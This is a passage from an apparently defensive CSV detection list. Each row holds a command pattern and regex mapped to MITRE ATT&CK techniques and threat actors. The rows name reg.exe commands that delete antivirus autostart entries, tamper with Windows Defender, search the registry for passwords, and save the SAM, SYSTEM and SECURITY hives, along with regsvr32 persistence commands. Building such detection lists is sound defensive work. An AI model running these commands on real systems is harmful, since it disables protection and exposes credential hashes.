""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""COMODO Internet Security"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""COMODO\sInternet\sSecurity\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""egui"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""egui\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""egui"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""egui\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""IseUI"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""IseUI\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""IseUI"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""IseUI\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v 
""QHSafeTray"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""QHSafeTray\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""QHSafeTray"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""QHSafeTray\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SBAMTray"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SBAMTray\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SBAMTray"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SBAMTray\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from 
launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SBRegRebootCleaner"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SBRegRebootCleaner\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SBRegRebootCleaner"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SBRegRebootCleaner\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense 
Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543 - T1112","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""SUPERAntiSpyware"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""SUPERAntiSpyware\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg delete 
""HKLM\Software\Microsoft\Windows\CurrentVersion\Run"" /v ""Windows Defender"" /f*",".{0,1000}reg\sdelete\s\""HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Windows\sDefender\""\s\/f.{0,1000}","greyware_tool_keyword","reg","remove Windows Defender from the system tray","T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""Zillya Antivirus"" /f /reg:32*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Zillya\sAntivirus\""\s\/f\s\/reg\:32.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*Reg Delete ""HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"" /v ""Zillya Antivirus"" /f /reg:64*",".{0,1000}Reg\sDelete\s\""HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\""\s\/v\s\""Zillya\sAntivirus\""\s\/f\s\/reg\:64.{0,1000}","greyware_tool_keyword","reg","prevents security tools from launching automatically","T1562.001 - T1543","TA0003 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://thedfirreport.com/2024/08/12/threat-actors-toolkit-leveraging-sliver-poshc2-batch-scripts/#c01","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*reg delete *HKLM\Software\Policies\Microsoft\Windows Defender* /f*",".{0,1000}reg\sdelete\s.{0,1000}HKLM\\Software\\Policies\\Microsoft\\Windows\sDefender.{0,1000}\s\/f.{0,1000}","greyware_tool_keyword","reg","Disable Real Time Protection","T1562.001 - 
T1055.001 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg query ""HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON"" /v CACHEDLOGONSCOUNT*",".{0,1000}reg\squery\s\""HKEY_LOCAL_MACHINE\\SOFTWARE\\MICROSOFT\\WINDOWS\sNT\\CURRENTVERSION\\WINLOGON\""\s\/v\sCACHEDLOGONSCOUNT.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*reg query HKCU /f passw /t REG_SZ /s*",".{0,1000}reg\squery\sHKCU\s\/f\spassw\s\/t\sREG_SZ\s\/s.{0,1000}","greyware_tool_keyword","reg","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*reg query HKCU /f pwd /t REG_SZ /s*",".{0,1000}reg\squery\sHKCU\s\/f\spwd\s\/t\sREG_SZ\s\/s.{0,1000}","greyware_tool_keyword","reg","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*reg query hkcu\software\*\putty\session*",".{0,1000}reg\squery\shkcu\\software\\.{0,1000}\\putty\\session.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry for sensitive information","T1012 - T1003.002","TA0007
- TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL*",".{0,1000}reg\squery\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\LSA\s\/v\sRunAsPPL.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL*",".{0,1000}reg\squery\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\s\/v\sRunAsPPL.{0,1000}","greyware_tool_keyword","reg","Check if LSASS is running in PPL","T1012 - T1003.003","TA0009 - TA0006","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Reconnaissance","https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASbat/winPEAS.bat","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\ /v RunAsPPL*",".{0,1000}reg\squery\sHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\\s\/v\sRunAsPPL.{0,1000}","greyware_tool_keyword","reg","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","Checking For Hidden Credentials With 
Appcmd.exe","10","10","2773","295","2024-08-29T22:58:18Z","2023-09-08T15:36:00Z" "*reg query HKLM /f passw /t REG_SZ /s*",".{0,1000}reg\squery\sHKLM\s\/f\spassw\s\/t\sREG_SZ\s\/s.{0,1000}","greyware_tool_keyword","reg","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*reg query HKLM /f pwd /t REG_SZ /s*",".{0,1000}reg\squery\sHKLM\s\/f\spwd\s\/t\sREG_SZ\s\/s.{0,1000}","greyware_tool_keyword","reg","associated with PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","15620","3035","2024-08-28T20:16:43Z","2019-01-13T19:58:24Z" "*reg query hklm\software\OpenSSH*",".{0,1000}reg\squery\shklm\\software\\OpenSSH.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry for sensitive information","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\OpenSSH\Agent*",".{0,1000}reg\squery\shklm\\software\\OpenSSH\\Agent.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry for sensitive information","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\realvnc*",".{0,1000}reg\squery\shklm\\software\\realvnc.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry for
sensitive information","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\realvnc\Allusers*",".{0,1000}reg\squery\shklm\\software\\realvnc\\Allusers.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry for sensitive information","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\realvnc\Allusers\vncserver*",".{0,1000}reg\squery\shklm\\software\\realvnc\\Allusers\\vncserver.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry for sensitive information","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query hklm\software\realvnc\vncserver*",".{0,1000}reg\squery\shklm\\software\\realvnc\\vncserver.{0,1000}","greyware_tool_keyword","reg","Query the Windows registry for sensitive information","T1012 - T1003.002","TA0007 - TA0003","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*reg query HKLM\System\CurrentControlSet\Control\LSA /v LsaCfgFlags*",".{0,1000}reg\squery\sHKLM\\System\\CurrentControlSet\\Control\\LSA\s\/v\sLsaCfgFlags.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable).
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*reg query HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential*",".{0,1000}reg\squery\sHKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\s\/v\sUseLogonCredential.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*reg save ""HK""L""""M\s""""a""""m"""" win32.dll*",".{0,1000}reg\ssave\s\""HK\""L\""M\\s\""a\""m\""\swin32\.dll.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*reg save ""HK""L""""M\s""""ys""""t""em"" win32.exe*",".{0,1000}reg\ssave\s\""HK\""L\""M\\s\""ys\""t\""em\""\swin32\.exe.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). 
This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*reg save ""HK*L*M\s*ec*u*rit*y*"" update.exe*",".{0,1000}reg\ssave\s\""HK.{0,1000}L.{0,1000}M\\s.{0,1000}ec.{0,1000}u.{0,1000}rit.{0,1000}y.{0,1000}\""\supdate\.exe.{0,1000}","greyware_tool_keyword","reg","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","N/A","9","1","27","1","2024-06-12T17:56:15Z","2023-02-07T22:10:08Z" "*reg save hklm\sam *.dat*",".{0,1000}reg\ssave\shklm\\sam\s.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\sam to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Volt Typhoon","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A" "*reg save HKLM\SAM *c:*",".{0,1000}reg\ssave\sHKLM\\SAM\s.{0,1000}c\:.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. 
By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg save hklm\sam sam*",".{0,1000}reg\ssave\shklm\\sam\ssam.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg save HKLM\SECURITY *c:*",".{0,1000}reg\ssave\sHKLM\\SECURITY\s.{0,1000}c\:.{0,1000}","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\security to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a","1","0","N/A","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A" "*reg save hklm\system *.dat*",".{0,1000}reg\ssave\shklm\\system\s.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","reg","saves a copy of the registry hive hklm\system to a .dat file","T1005 - T1003.002","TA0005 - TA0003","N/A","Volt Typhoon","Collection","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","greyware_tools high risks of false positives","10","10","N/A","N/A","N/A","N/A" "*reg save HKLM\SYSTEM *c:*",".{0,1000}reg\ssave\sHKLM\\SYSTEM\s.{0,1000}c\:.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive 
Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg save hklm\system system*",".{0,1000}reg\ssave\shklm\\system\ssystem.{0,1000}","greyware_tool_keyword","reg","the commands are used to export the SAM and SYSTEM registry hives which contain sensitive Windows security data including hashed passwords for local accounts. By obtaining these hives an attacker can attempt to crack the hashes or use them in pass-the-hash attacks for unauthorized access.","T1003.002","TA0009","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Collection","N/A","1","0","N/A","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" "*reg.exe add *HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction*",".{0,1000}reg\.exe\sadd\s.{0,1000}HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\sDefender\\Threats\\ThreatIDDefaultAction.{0,1000}","greyware_tool_keyword","reg","Windows Defender Tampering Via registry","T1489 - T1112","TA0005","N/A","Rancor - OilRig - Dragonfly - GALLIUM - Turla","Defense Evasion","https://www.virustotal.com/gui/file/00820a1f0972678cfe7885bc989ab3e5602b0febc96baf9bf3741d56aa374f03/behavior","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A" "*cmd /c regsvr32.exe /s C:\*\desktop.ini"" start= auto*",".{0,1000}cmd\s\/c\sregsvr32\.exe\s\/s\sC\:\\.{0,1000}\\desktop\.ini\""\sstart\=\sauto.{0,1000}","greyware_tool_keyword","regsvr32","suspicious service creation executing a desktop.ini file observed in a malware 
sample","T1543.003","TA0003","N/A","N/A","Persistence","https://www.virustotal.com/gui/file/faca8b6f046dad8f0e27a75fa2dc5477d3ccf44adced64481ef1b0dd968b4b0e/behavior","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "*regsvr32 AmsiProvider.dll*",".{0,1000}regsvr32\sAmsiProvider\.dll.{0,1000}","greyware_tool_keyword","regsvr32","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","The AMSI Provider can be registered with the system by executing the following command from an elevated command prompt - risk of false positive","9","2","134","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*sc create *cmd /c regsvr32.exe /s *\desktop.ini*",".{0,1000}sc\screate\s.{0,1000}cmd\s\/c\sregsvr32\.exe\s\/s\s.{0,1000}\\desktop\.ini.{0,1000}","greyware_tool_keyword","regsvr32","suspicious service creation executing a desktop.ini file observed in a malware sample","T1543.003","TA0003","N/A","N/A","Persistence","https://www.virustotal.com/gui/file/faca8b6f046dad8f0e27a75fa2dc5477d3ccf44adced64481ef1b0dd968b4b0e/behavior","1","0","N/A","N/A","6","8","N/A","N/A","N/A","N/A" "* \\\\localhost /user:Username /pwd:Password 